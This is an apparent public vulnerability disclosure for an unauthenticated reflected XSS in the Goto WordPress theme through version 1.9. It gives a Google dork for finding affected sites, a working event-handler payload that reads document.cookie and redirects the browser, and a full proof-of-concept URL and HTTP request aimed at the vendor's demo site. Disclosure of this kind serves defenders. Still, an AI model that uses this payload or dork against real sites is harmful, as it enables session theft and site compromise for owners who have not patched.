/*! - # VULNERABILITY: Goto WordPress Theme <= 1.9 - Unauthenticated Reflected XSS - # GOOGLE DORK: inurl:/wp-content/themes/goto/ - # DATE: 2021-02-10 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: BoostifyThemes [ https://boostifythemes.com ] - # SOFTWARE VERSION: <= 1.9 - # SOFTWARE LINK: https://themeforest.net/item/goto-tour-travel-wordpress-theme/21822828 - # CVSS: AV:N/AC:L/PR:N/UI:N/S:C - # CWE: CWE-79 - # CVE: N/A */ ### -- [ Info: ] [i] An Unauthenticated Reflected XSS vulnerability was discovered in the Goto theme through v1.9 for WordPress. [i] Vulnerable parameter(s): ?keywords= and ?start_date=. ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payload: ] [$] <input/Autofocus/%0D*/Onfocus=alert(`m0ze`);alert(document.cookie);location=`https://m0ze.ru`;//> ### -- [ PoC | Unauthenticated Reflected XSS | Search query: ] [!] https://boostifythemes.com/demo/wp/goto/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3Blocation%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%3E&start_date=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3Blocation%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%3E&avaibility=13 [!] GET /demo/wp/goto/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3Blocation%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%3E&start_date=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3Blocation%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%3E&avaibility=13 HTTP/1.1 Host: boostifythemes.com ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze